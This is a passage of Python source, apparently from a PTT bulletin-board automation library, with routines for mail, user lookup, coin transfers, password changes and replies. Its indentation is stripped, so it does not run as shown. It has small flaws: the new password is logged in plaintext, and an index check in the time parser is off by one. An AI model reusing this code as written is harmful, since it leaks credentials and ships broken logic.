PostContent = '\n'.join(PostContentList)
PosRawData = '\n'.join(PostRawContentListTemp)
# self.Log('PostContent: =' + PostContent + '=')
# self.Log('PostIP: =' + PostIP + '=')
result = Information.PostInformation(Board, PostID, PostAuthor, PostDate, PostTitle, PostWeb, PostMoney,PostContent, PostIP, PostPushList, PosRawData, DeleteStatus=PostDeleteStatus.NotDeleted)
self.__WaterBallProceeor()
self.__ErrorCode = ErrCode
return ErrCode, result
def mail(self, UserID, MailTitle, MailContent, SignType):
self.__IdleTime = 0
ConnectIndex = 0
if self.__isMailBoxFull:
self.__MailFullAPILock = True
self.Log('信箱已滿,已鎖定其他 API,請盡速清理信箱')
ErrCode = ErrorCode.Success
try:
UserID = str(UserID)
MailTitle = str(MailTitle)
MailContent = str(MailContent)
SignType = int(SignType)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
MailContentListTemp = MailContent.split('\r')
MailContentList = []
MailContentListIndex = 0
while len(MailContentListTemp) != 0:
if len(MailContentListTemp) >= 20:
MailContentList.append('\r'.join(MailContentListTemp[0:20]))
for i in range(20):
MailContentListTemp.pop(0)
else:
MailContentList.append('\r'.join(MailContentListTemp))
break
MailContentList.append('')
if self.__MailFullAPILock:
SendMessage = GotoMainMenuCommand + ' S\r' + UserID + '\r' + MailTitle + '\r'
else:
SendMessage = GotoMainMenuCommand + 'M\rS\r' + UserID + '\r' + MailTitle + '\r'
Refresh = True
isBreakDetect = False
# 先後順序代表偵測的優先順序
DetectTargetList = [
DetectUnit(
'編輯文章 ' + str(int((MailContentListIndex + 1) * 100 / len(MailContentList))) + ' %',
'編輯文章',
ResponseUnit(MailContentList[MailContentListIndex], True),
),
PTTBUGDetectUnit
]
self.__APILock[ConnectIndex].acquire()
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('超時')
break
elif ErrCode != ErrorCode.Success:
self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
isDetectedTarget = False
for i in range(len(DetectTargetList)):
if DetectTargetList[i].isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTargetList[i].getDisplayMsg())
SendMessage = DetectTargetList[i].getResponse().getSendMessage()
Refresh = DetectTargetList[i].getResponse().needRefresh()
isDetectedTarget = True
if DetectTargetList[i].isBreakDetect():
isBreakDetect = True
ErrCode = DetectTargetList[i].getErrorCode()
if '編輯文章' in DetectTargetList[i].getDisplayMsg():
MailContentListIndex += 1
if MailContentListIndex == len(MailContentList):
isBreakDetect = True
break
DetectTargetList[i] = DetectUnit(
'編輯文章 ' + str(int((MailContentListIndex + 1) * 100 / len(MailContentList))) + ' %',
'編輯文章',
ResponseUnit('\r' + MailContentList[MailContentListIndex], True),
)
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name + ' part 1', ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
SendMessage = '\x18'
Refresh = True
isBreakDetect = False
DetectTargetList = [
DetectUnit(
'任意鍵繼續',
'任意鍵',
ResponseUnit(GotoMainMenuCommand, False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'儲存檔案',
'確定要儲存檔案嗎',
ResponseUnit('s\r', False),
),
DetectUnit(
'自存底稿',
'是否自存底稿',
ResponseUnit('y\r', True),
),
# 選擇簽名檔
DetectUnit(
'選擇第 ' + str(SignType) + ' 簽名檔',
'選擇簽名檔',
ResponseUnit(str(SignType) + '\r', True),
),
DetectUnit(
'選擇第 ' + str(SignType) + ' 簽名檔',
'x=隨機',
ResponseUnit(str(SignType) + '\r', True),
),
DetectUnit(
'電子郵件選單',
'【電子郵件】',
ResponseUnit('\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'電子郵件選單',
'【主功能表】',
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('超時')
break
elif ErrCode != ErrorCode.Success:
self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
isDetectedTarget = False
for i in range(len(DetectTargetList)):
if DetectTargetList[i].isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTargetList[i].getDisplayMsg())
SendMessage = DetectTargetList[i].getResponse().getSendMessage()
Refresh = DetectTargetList[i].getResponse().needRefresh()
isDetectedTarget = True
if DetectTargetList[i].isBreakDetect():
isBreakDetect = True
ErrCode = DetectTargetList[i].getErrorCode()
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name + ' part 2', ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
self.__APILock[ConnectIndex].release()
self.__WaterBallProceeor()
self.__ErrorCode = ErrCode
return ErrCode
def getTime(self):
ConnectIndex = 0
result = None
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode, result
self.__APILock[ConnectIndex].acquire()
for i in range(3):
ErrCode, result = self.__getTime()
if ErrCode == ErrorCode.WaitTimeout or ErrCode == ErrorCode.Success:
break
self.__APILock[ConnectIndex].release()
self.__WaterBallProceeor()
self.__ErrorCode = ErrCode
return ErrCode, result
def __getTime(self):
self.__IdleTime = 0
ConnectIndex = 0
result = None
# \x1b\x4fA (上, 下右左 BCD)
SendMessage = GotoMainMenuCommand + 'P\x1b\x4fC\x1b\x4fD'
Refresh = True
isBreakDetect = False
# 先後順序代表偵測的優先順序
DetectTargetList = [
DetectUnit(
'',
'我是' + self.__ID,
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('超時')
break
elif ErrCode != ErrorCode.Success:
self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__ErrorCode = ErrCode
return ErrCode, result
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTarget.getDisplayMsg(), _LogLevel=LogLevel.DEBUG)
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
isDetectedTarget = True
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
if not isDetectedTarget:
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
# self.Log('無法解析的狀態! PTT Library 緊急停止')
# sys.exit()
ErrCode = ErrorCode.ParseError
self.__ErrorCode = ErrCode
return ErrCode, result
if ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
return ErrCode, result
LastLine = self.__ReceiveData[ConnectIndex].split('\n').pop()
LastLineList = list(map(int, re.findall(r'\d+', LastLine)))
if len(LastLineList) < 3:
ErrCode = ErrorCode.ParseError
self.__ErrorCode = ErrCode
return ErrCode, result
Hour = str(LastLineList[2])
Min = str(LastLineList[3])
if len(Hour) == 1:
Hour = '0' + Hour
if len(Min) == 1:
Min = '0' + Min
result = Hour + ':' + Min
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode, result
def getUser(self, UserID):
self.__IdleTime = 0
ConnectIndex = 0
result = None
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode, result
try:
UserID = str(UserID)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
self.__APILock[ConnectIndex].acquire()
SendMessage = '\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fDT\rQ\r' + UserID + '\r'
Refresh = True
isBreakDetect = False
# 先後順序代表偵測的優先順序
DetectTargetList = [
DetectUnit(
'取得使用者資料頁面',
'任意鍵',
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'查無該使用者',
'【聊天說話】',
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.NoUser
),
PTTBUGDetectUnit
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('超時')
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
elif ErrCode != ErrorCode.Success:
self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTarget.getDisplayMsg(), _LogLevel=LogLevel.DEBUG)
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
isDetectedTarget = True
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
UserPageList = self.__ReceiveData[ConnectIndex].split('\n')
# for i in range(len(UserPageList)):
# print('Q', UserPageList[i])
UserPage = '\n'.join(UserPageList[2:6])
# print(UserPage)
UserDataList = list(map(int, re.findall(r'\d+', UserPage)))
# print(UserDataList)
# print(len(UserDataList)) 19
LoginTime = UserDataList[0]
LegalPost = UserDataList[1]
IllegalPost = UserDataList[2]
LastIP = str(UserDataList[9]) + '.' + str(UserDataList[10]) + '.' + str(UserDataList[11]) + '.' + str(UserDataList[12])
FiveChess = UserDataList[13:16]
Chess = UserDataList[16:19]
ID = UserPageList[1]
ID = ID[ID.find('《ID暱稱》') + len('《ID暱稱》') : ID.find('《經濟狀況》')]
while ID.startswith(' '):
ID = ID[1:]
while ID.endswith(' '):
ID = ID[:-1]
Money = UserPageList[1]
Money = Money[Money.find('《經濟狀況》') + len('《經濟狀況》') :]
while Money.startswith(' '):
Money = Money[1:]
while Money.endswith(' '):
Money = Money[:-1]
State = UserPageList[3]
State = State[State.find('《目前動態》') + len('《目前動態》') : State.find('《私人信箱》')]
while State.startswith(' '):
State = State[1:]
while State.endswith(' '):
State = State[:-1]
Mail = UserPageList[3]
Mail = Mail[Mail.find('《私人信箱》') + len('《私人信箱》') :]
while Mail.startswith(' '):
Mail = Mail[1:]
while Mail.endswith(' '):
Mail = Mail[:-1]
LastLogin = UserPageList[4]
LastLogin = LastLogin[LastLogin.find('《上次上站》') + len('《上次上站》') : LastLogin.find('《上次故鄉》')]
while LastLogin.startswith(' '):
LastLogin = LastLogin[1:]
while LastLogin.endswith(' '):
LastLogin = LastLogin[:-1]
# print('ID:', ID)
# print('Money:', Money)
# print('State:', State)
# print('Mail:', Mail)
# print('LastLogin:', LastLogin)
# print('LoginTime:', LoginTime)
# print('LegalPost:', LegalPost)
# print('IllegalPost:', IllegalPost)
# print('LastIP:', LastIP)
# print('FiveChess:', FiveChess)
# print('Chess:', Chess)
result = Information.UserInformation(ID, Money, LoginTime, LegalPost, IllegalPost, State, Mail, LastLogin, LastIP, FiveChess, Chess)
self.__APILock[ConnectIndex].release()
self.__WaterBallProceeor()
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode, result
def getNewestIndex(self, Board='', SearchType=0, Search=''):
self.__IdleTime = 0
ConnectIndex = 0
result = 0
try:
Board = str(Board)
SearchType = int(SearchType)
Search = str(Search)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if SearchType < PostSearchType.MinValue or PostSearchType.MaxValue < SearchType:
self.Log('搜尋類型輸入錯誤: 無法判別搜尋類型 搜尋條件失效', LogLevel.WARNING)
Search = ''
SearchType = PostSearchType.Unknow
if (Search != '' and SearchType == PostSearchType.Unknow) or (Search == '' and SearchType != PostSearchType.Unknow):
self.Log('無法判別搜尋類型 搜尋條件失效', LogLevel.WARNING)
Search = ''
if Board == '' and Search != '':
self.Log('郵件模式下無法使用搜尋條件', LogLevel.WARNING)
Search = ''
if SearchType == PostSearchType.Keyword:
pass
elif SearchType == PostSearchType.Author:
pass
elif SearchType == PostSearchType.Push:
if not Search.isdigit():
self.Log('搜尋條件輸入錯誤: 搜尋推文數 但搜尋條件非數字 搜尋條件失效', LogLevel.WARNING)
Search = ''
SearchType = PostSearchType.Unknow
elif SearchType == PostSearchType.Mark:
if Search != 'm' and Search != 's':
self.Log('搜尋條件輸入錯誤: 搜尋標記 但搜尋條件非 m 或 s 搜尋條件失效', LogLevel.WARNING)
Search = ''
SearchType = PostSearchType.Unknow
elif SearchType == PostSearchType.Money:
if not Search.isdigit():
self.Log('搜尋條件輸入錯誤: 搜尋稿酬 但搜尋條件非數字 搜尋條件失效', LogLevel.WARNING)
Search = ''
SearchType = PostSearchType.Unknow
self.__APILock[ConnectIndex].acquire()
if Board == '':
SendMessage = GotoMainMenuCommand + ' \x1aM0\r$'
Refresh = True
isBreakDetect = False
# 先後順序代表偵測的優先順序
DetectTargetList = [
DetectUnit(
'進入信箱',
'郵件選單',
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
#
PTTBUGDetectUnit
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('超時')
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
elif ErrCode != ErrorCode.Success:
self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTarget.getDisplayMsg(), _LogLevel=LogLevel.DEBUG)
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
isDetectedTarget = True
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
MailBoxLineList = self.__ReceiveData[ConnectIndex].split('\n')
# for i in range(len(MailBoxLineList)):
# print('line', i,MailBoxLineList[i])
result = list(map(int, re.findall(r'\d+', MailBoxLineList[3])))[0]
else:
if not self.__APICheck(sys._getframe().f_code.co_name):
self.__APILock[ConnectIndex].release()
return self.__ErrorCode, result
for i in range(3):
ErrCode, result = self.__getNewestPostIndex(Board=Board, SearchType=SearchType, Search=Search)
if ErrCode == ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
self.__APILock[ConnectIndex].release()
self.__WaterBallProceeor()
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode, result
def getMail(self, MailIndex):
self.__IdleTime = 0
ConnectIndex = 0
result = None
# 此 api 不受 MailFulllock 影響
try:
MailIndex = int(MailIndex)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if MailIndex <= 0:
self.Log('錯誤的輸入: ' + str(MailIndex))
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
ErrCode, NewestMailIndex = self.getNewestIndex()
if ErrCode != ErrorCode.Success:
self.Log('取得最新信箱編號失敗: ' + str(ErrCode))
self.__ErrorCode = ErrCode
return ErrCode, result
if MailIndex > NewestMailIndex:
self.Log('錯誤的輸入: ' + str(MailIndex))
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if NewestMailIndex == 0:
self.Log('信箱中沒有郵件')
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode, result
else:
self.Log('信箱中最新郵件編號: ' + str(NewestMailIndex), LogLevel.DEBUG)
self.__APILock[ConnectIndex].acquire()
SendMessage = str(MailIndex) + '\r\r'
Refresh = True
isBreakDetect = False
# 先後順序代表偵測的優先順序
DetectTargetList = [
DetectUnit(
'讀取信件完畢',
'(100%) 目前顯示: 第',
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'',
'目前顯示',
ResponseUnit('', False),
),
PTTBUGDetectUnit
]
FirstPage = ''
PageIndex = 2
LastPageIndex = 0
MailContentList = []
MailRawContentList = []
isFirstPage = True
NewLine, _ = uao.encode('\n')
NewLineByte = NewLine[0]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('超時')
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
elif ErrCode != ErrorCode.Success:
self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
isDetectedTarget = False
if FirstPage == '':
FirstPage = self.__ReceiveData[ConnectIndex]
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTarget.getDisplayMsg(), _LogLevel=LogLevel.DEBUG)
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
CurrentPage = self.__ReceiveData[ConnectIndex]
CurrentRawPage = list(self.__ReceiveRawData[ConnectIndex])
CurrentPageList = CurrentPage.split('\n')
PageLineRange = CurrentPageList.pop()
# CurrentRawPage.pop()
LastIndex = 0
for i in range(len(CurrentRawPage)):
if CurrentRawPage[i] == NewLineByte:
LastIndex = i
if LastIndex != 0:
CurrentRawPage = CurrentRawPage[:LastIndex]
PageLineRangeTemp = re.findall(r'\d+', PageLineRange)
PageLineRangeTemp = list(map(int, PageLineRangeTemp))[-2:]
OverlapLine = LastPageIndex - PageLineRangeTemp[0] + 1
# 處理分隔線造成的行數計算錯誤
# if PageLineRangeTemp[0] > 1 and PageLineRangeTemp[0] < 5:
# OverlapLine += 1
if OverlapLine >= 1 and LastPageIndex != 0:
# print('重疊', OverlapLine, '行')
CurrentPageList = CurrentPageList[OverlapLine:]
if not isFirstPage:
for i in range(OverlapLine):
for ii in range(len(CurrentRawPage)):
if CurrentRawPage[ii] == NewLineByte:
CurrentRawPage = CurrentRawPage[ii + 1:]
break
LastPageIndex = PageLineRangeTemp[1]
MailContentList.extend(CurrentPageList)
if not isFirstPage:
MailRawContentList.extend([NewLineByte])
MailRawContentList.extend(CurrentRawPage)
isDetectedTarget = True
if DetectTarget.isBreakDetect():
IPLine = CurrentPageList.pop()
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
SendMessage = str(PageIndex) + '\r'
Refresh = True
isFirstPage = False
PageIndex += 1
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
MailLineList = FirstPage.split('\n')
Target = '作者 '
if Target in FirstPage:
MailAuthor = MailLineList[0]
MailAuthor = MailAuthor[MailAuthor.find(Target) + len(Target):]
MailAuthor = MailAuthor[:MailAuthor.find('\r')]
MailAuthor = MailAuthor.rstrip()
else:
MailAuthor = None
Target = '標題 '
if Target in FirstPage:
MailTitle = MailLineList[1]
MailTitle = MailTitle[MailTitle.find(Target) + len(Target):]
MailTitle = MailTitle[:MailTitle.find('\r')]
MailTitle = MailTitle.rstrip()
else:
MailTitle = None
Target = '時間 '
if Target in FirstPage:
MailDate = MailLineList[2]
MailDate = MailDate[MailDate.find(Target) + len(Target):]
MailDate = MailDate[:MailDate.find('\r')]
MailDate = MailDate.rstrip()
else:
MailDate = None
# self.Log('MailAuthor: =' + MailAuthor + '=', LogLevel.DEBUG)
# self.Log('MailTitle: =' + MailTitle + '=', LogLevel.DEBUG)
# self.Log('MailDate: =' + MailDate + '=', LogLevel.DEBUG)
MailIP = None
for line in MailContentList:
# print('! ' + line)
if '※ 發信站: 批踢踢實業坊(ptt.cc), 來自' in line:
IPCheck = re.search("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", line)
if IPCheck != None:
MailIP = IPCheck.group()
MailContent = '\n'.join(MailContentList)
MailRawContent = MailRawContentList
# self.Log('MailContent: =' + MailContent + '=', LogLevel.DEBUG)
# if len(IPLine) < 7:
# # 如果只有一頁的情況,IP 會顯示在第一頁
# IPLine = MailLineList.pop()
# IPLine = IPLine[:IPLine.find('瀏覽')]
# MailIPList = list(map(str, re.findall(r'\d+', IPLine)))
# MailIP = '.'.join(MailIPList)
# self.Log('MailIP: =' + MailIP + '=', LogLevel.DEBUG)
result = Information.MailInformation(MailAuthor, MailTitle, MailDate, MailContent, MailIP, MailRawContent)
self.__APILock[ConnectIndex].release()
self.__WaterBallProceeor()
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode, result
def giveMoney(self, ID, Money, YourPassword):
self.__IdleTime = 0
ConnectIndex = 0
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode
try:
ID = str(ID)
Money = int(Money)
YourPassword = str(YourPassword)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
self.__APILock[ConnectIndex].acquire()
# 前進至主頁面
SendMessage = '\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fD'
# 前進至發錢的地方
SendMessage += 'P\rP\rO\r'
Refresh = True
isBreakDetect = False
# 先後順序代表偵測的優先順序
DetectTargetList = [
#
DetectUnit(
'P 幣不足',
'你沒有那麼多Ptt幣喔!',
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.NoEnoughP
),
DetectUnit(
'輸入幸運兒帳號',
'這位幸運兒的id',
ResponseUnit(ID + '\r', False),
),
DetectUnit(
'輸入金額',
'要給他多少Ptt幣呢?',
ResponseUnit('\t' + str(Money) + '\r', False),
),
DetectUnit(
'無需密碼',
'認證尚未過期',
ResponseUnit('y\r', False),
),
DetectUnit(
'確認身分',
'完成交易前要重新確認您的身份',
ResponseUnit(YourPassword + '\r', False),
),
DetectUnit(
'等待交易進行中',
'交易正在進行中',
ResponseUnit('', False),
),
DetectUnit(
'',
'要修改紅包袋嗎?',
ResponseUnit('\r', False),
),
DetectUnit(
'交易成功',
'按任意鍵繼續',
ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
),
DetectUnit(
'',
'主功能表',
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('登入超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
self.Log('登入操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTarget.getDisplayMsg())
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
isDetectedTarget = True
if DetectTarget.isBreakDetect():
self.__isConnected[ConnectIndex] = True
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
self.__APILock[ConnectIndex].release()
self.__WaterBallProceeor()
self.__ErrorCode = ErrCode
return ErrCode
def changePassword(self, OldPassword, NewPassword):
self.__IdleTime = 0
ConnectIndex = 0
ErrCode = ErrorCode.Success
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode
try:
OldPassword = str(OldPassword)
NewPassword = str(NewPassword)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
if len(NewPassword) > 8:
self.Log('新密碼超過八位後將被系統省略', LogLevel.WARNING)
while len(NewPassword) > 8:
NewPassword = NewPassword[:-1]
self.__APILock[ConnectIndex].acquire()
# 前進至主頁面
SendMessage = '\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fD'
# 前進至修改密碼的地方
SendMessage += 'U\rI\r2\r'
Refresh = True
isBreakDetect = False
# 先後順序代表偵測的優先順序
DetectTargetList = [
DetectUnit(
'輸入舊密碼',
'請輸入原密碼',
ResponseUnit(OldPassword + '\r', False),
LogLV = LogLevel.DEBUG,
),
DetectUnit(
'輸入新密碼',
'請設定新密碼',
ResponseUnit(NewPassword + '\r', False),
LogLV = LogLevel.DEBUG,
),
DetectUnit(
'確認新密碼',
'請檢查新密碼',
ResponseUnit(NewPassword + '\r', False),
LogLV = LogLevel.DEBUG,
),
DetectUnit(
'確認',
'您確定(Y/N)',
ResponseUnit('y\r', True),
LogLV = LogLevel.DEBUG,
),
DetectUnit(
'注意!您已將舊密碼更換為新密碼(' + NewPassword + ')',
'我是' + self.__ID,
ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
),
DetectUnit(
'密碼不正確',
'您輸入的密碼不正確',
ResponseUnit('y\r', True),
BreakDetect=True,
ErrCode = ErrorCode.WrongPassword
),
DetectUnit(
'',
'主功能表',
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('操作超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
self.Log('操作操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTarget.getDisplayMsg(), DetectTarget.getLogLevel())
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
isDetectedTarget = True
if DetectTarget.isBreakDetect():
self.__isConnected[ConnectIndex] = True
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
self.__APILock[ConnectIndex].release()
self.__WaterBallProceeor()
self.__ErrorCode = ErrCode
return ErrCode
def replyPost(self, Board, Content, ReplyType, PostID='', Index=-1):
self.__IdleTime = 0
ConnectIndex = 0
ErrCode = ErrorCode.Success
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode
try:
Board = str(Board)
Content = str(Content)
ReplyType = int(ReplyType)
PostID = str(PostID)
Index = int(Index)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
ReplyResponse = ''
if ReplyType == ReplyPostType.Board:
ReplyResponse = 'F'
elif ReplyType == ReplyPostType.Mail:
ReplyResponse = 'M'
elif ReplyType == ReplyPostType.Board_Mail:
ReplyResponse = 'B'
else:
self.Log('回文種類輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
if PostID == '' and Index == -1:
self.Log('輸入參數錯誤')
ErrCode = ErrorCode.ErrorInput
